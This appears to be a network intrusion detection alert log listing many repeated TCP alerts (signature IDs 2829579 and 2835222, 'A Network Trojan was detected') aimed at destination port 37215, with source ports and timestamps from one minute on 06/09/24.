          SID:2829579
          Source Port:43668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243955
          SID:2835222
          Source Port:51086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414784
          SID:2829579
          Source Port:58038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716551
          SID:2829579
          Source Port:58358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919065
          SID:2835222
          Source Port:48912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133154
          SID:2829579
          Source Port:33522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916497
          SID:2835222
          Source Port:33104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168642
          SID:2829579
          Source Port:33630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284247
          SID:2835222
          Source Port:50234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647666
          SID:2835222
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247651
          SID:2835222
          Source Port:34854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398090
          SID:2835222
          Source Port:42144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472416
          SID:2829579
          Source Port:33680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396321
          SID:2835222
          Source Port:39192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250874
          SID:2835222
          Source Port:56134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080607
          SID:2829579
          Source Port:36650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278823
          SID:2829579
          Source Port:59122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930279
          SID:2835222
          Source Port:33782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160337
          SID:2829579
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080805
          SID:2835222
          Source Port:40602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668649
          SID:2829579
          Source Port:51566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.026987
          SID:2829579
          Source Port:57122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027259
          SID:2835222
          Source Port:40568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667858
          SID:2835222
          Source Port:43106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162427
          SID:2829579
          Source Port:39082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083014
          SID:2829579
          Source Port:57720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467789
          SID:2829579
          Source Port:57852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818782
          SID:2835222
          Source Port:52414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206556
          SID:2829579
          Source Port:34708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645953
          SID:2835222
          Source Port:46924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.950206
          SID:2835222
          Source Port:55460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032892
          SID:2829579
          Source Port:35242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820926
          SID:2829579
          Source Port:54236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915909
          SID:2829579
          Source Port:38144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600558
          SID:2835222
          Source Port:37384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676013
          SID:2829579
          Source Port:59838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942095
          SID:2829579
          Source Port:35404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467986
          SID:2829579
          Source Port:34556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557333
          SID:2835222
          Source Port:47428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034056
          SID:2829579
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168666
          SID:2835222
          Source Port:60074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137877
          SID:2829579
          Source Port:53312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223835
          SID:2829579
          Source Port:54648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.078274
          SID:2835222
          Source Port:58696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818623
          SID:2835222
          Source Port:50558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291269
          SID:2835222
          Source Port:41660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719620
          SID:2835222
          Source Port:34206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104836
          SID:2835222
          Source Port:48160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162948
          SID:2835222
          Source Port:59786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249634
          SID:2829579
          Source Port:60186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418847
          SID:2829579
          Source Port:57792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472269
          SID:2835222
          Source Port:59450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164505
          SID:2835222
          Source Port:46566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396506
          SID:2829579
          Source Port:52560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274462
          SID:2829579
          Source Port:38828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719067
          SID:2829579
          Source Port:33864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299271
          SID:2829579
          Source Port:51822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399135
          SID:2829579
          Source Port:47304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163350
          SID:2829579
          Source Port:52834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645478
          SID:2829579
          Source Port:51240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948069
          SID:2835222
          Source Port:52292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281051
          SID:2835222
          Source Port:47806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273344
          SID:2829579
          Source Port:40464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720307
          SID:2829579
          Source Port:38018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552399
          SID:2835222
          Source Port:52732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472217
          SID:2835222
          Source Port:55448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867142
          SID:2829579
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468488
          SID:2835222
          Source Port:36550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718939
          SID:2829579
          Source Port:45200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164980
          SID:2835222
          Source Port:42858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721406
          SID:2835222
          Source Port:53948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168209
          SID:2835222
          Source Port:49638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074536
          SID:2829579
          Source Port:37632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077919
          SID:2829579
          Source Port:45968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292142
          SID:2835222
          Source Port:43412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.095884
          SID:2835222
          Source Port:56756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922188
          SID:2835222
          Source Port:50394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718194
          SID:2835222
          Source Port:43180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247268
          SID:2835222
          Source Port:36520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103567
          SID:2829579
          Source Port:41514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719906
          SID:2835222
          Source Port:57326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035119
          SID:2835222
          Source Port:35360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945931
          SID:2829579
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466215
          SID:2835222
          Source Port:60514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571457
          SID:2829579
          Source Port:34278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892478
          SID:2835222
          Source Port:36618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164533
          SID:2829579
          Source Port:39234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687368
          SID:2835222
          Source Port:44472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227490
          SID:2835222
          Source Port:58882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223267
          SID:2829579
          Source Port:42290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477560
          SID:2829579
          Source Port:48610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900344
          SID:2829579
          Source Port:44926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946743
          SID:2829579
          Source Port:42278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568274
          SID:2835222
          Source Port:40304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821472
          SID:2835222
          Source Port:41144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417673
          SID:2829579
          Source Port:60384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036279
          SID:2829579
          Source Port:47920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821753
          SID:2835222
          Source Port:33922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909753
          SID:2829579
          Source Port:37018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721355
          SID:2835222
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296710
          SID:2829579
          Source Port:51114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225212
          SID:2835222
          Source Port:50738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.307351
          SID:2835222
          Source Port:57790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946966
          SID:2829579
          Source Port:37088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464657
          SID:2835222
          Source Port:38120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821604
          SID:2835222
          Source Port:60800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035538
          SID:2829579
          Source Port:46956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103511
          SID:2829579
          Source Port:45866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169266
          SID:2835222
          Source Port:56818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225902
          SID:2829579
          Source Port:38172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.859457
          SID:2835222
          Source Port:43882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081989
          SID:2835222
          Source Port:43402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985299
          SID:2835222
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559661
          SID:2829579
          Source Port:45584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418900
          SID:2835222
          Source Port:58068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414901
          SID:2829579
          Source Port:49204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990525
          SID:2835222
          Source Port:38828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226808
          SID:2829579
          Source Port:57058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081729
          SID:2829579
          Source Port:54942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159563
          SID:2829579
          Source Port:51144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017440
          SID:2829579
          Source Port:40064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819887
          SID:2829579
          Source Port:39530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719795
          SID:2829579
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162841
          SID:2829579
          Source Port:53714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694671
          SID:2829579
          Source Port:56066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947354
          SID:2835222
          Source Port:37566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034754
          SID:2835222
          Source Port:48564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248867
          SID:2829579
          Source Port:42310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082257
          SID:2835222
          Source Port:36136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660410
          SID:2835222
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073827
          SID:2835222
          Source Port:52090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860308
          SID:2829579
          Source Port:58576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.992052
          SID:2829579
          Source Port:53772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721047
          SID:2835222
          Source Port:43854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986547
          SID:2835222
          Source Port:50298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721582
          SID:2829579
          Source Port:57848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415733
          SID:2835222
          Source Port:32844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035823
          SID:2835222
          Source Port:40410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931555
          SID:2829579
          Source Port:55470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129320
          SID:2829579
          Source Port:37488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164643
          SID:2835222
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414599
          SID:2829579
          Source Port:43398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290029
          SID:2835222
          Source Port:34952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945547
          SID:2835222
          Source Port:46194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861167
          SID:2829579
          Source Port:46872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412504
          SID:2829579
          Source Port:60686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302496
          SID:2835222
          Source Port:36438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302590
          SID:2835222
          Source Port:35690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067334
          SID:2835222
          Source Port:39394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721393
          SID:2835222
          Source Port:53690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415996
          SID:2835222
          Source Port:44132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397805
          SID:2829579
          Source Port:49186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714393
          SID:2829579
          Source Port:52642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601114
          SID:2829579
          Source Port:43444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861111
          SID:2835222
          Source Port:55418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411646
          SID:2835222
          Source Port:47678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993633
          SID:2835222
          Source Port:54992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296751
          SID:2835222
          Source Port:49356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206235
          SID:2829579
          Source Port:57240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643856
          SID:2829579
          Source Port:34604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467850
          SID:2829579
          Source Port:57146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718464
          SID:2829579
          Source Port:45890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714455
          SID:2829579
          Source Port:35396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296810
          SID:2835222
          Source Port:35028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599418
          SID:2835222
          Source Port:33910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988030
          SID:2829579
          Source Port:36172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282376
          SID:2835222
          Source Port:43062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720242
          SID:2829579
          Source Port:43832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593764
          SID:2835222
          Source Port:52314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989580
          SID:2835222
          Source Port:35618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285498
          SID:2835222
          Source Port:44146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915752
          SID:2835222
          Source Port:59818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869842
          SID:2829579
          Source Port:44206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994784
          SID:2835222
          Source Port:53644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566254
          SID:2829579
          Source Port:39640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159436
          SID:2829579
          Source Port:43988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718207
          SID:2829579
          Source Port:41222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718232
          SID:2829579
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008179
          SID:2829579
          Source Port:35340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602456
          SID:2835222
          Source Port:53718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921022
          SID:2835222
          Source Port:60056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929136
          SID:2835222
          Source Port:49456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950339
          SID:2829579
          Source Port:52336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080877
          SID:2835222
          Source Port:51602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718793
          SID:2829579
          Source Port:53434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.083132
          SID:2829579
          Source Port:55680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.093303
          SID:2829579
          Source Port:43884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.554098
          SID:2829579
          Source Port:37496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166171
          SID:2835222
          Source Port:35284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605934
          SID:2835222
          Source Port:52432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205479
          SID:2835222
          Source Port:33198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472163
          SID:2829579
          Source Port:36066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474743
          SID:2835222
          Source Port:55732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082240
          SID:2829579
          Source Port:32892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820360
          SID:2835222
          Source Port:48450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288279
          SID:2835222
          Source Port:38462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914740
          SID:2829579
          Source Port:39432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822907
          SID:2829579
          Source Port:33254
          Destination Port:37215
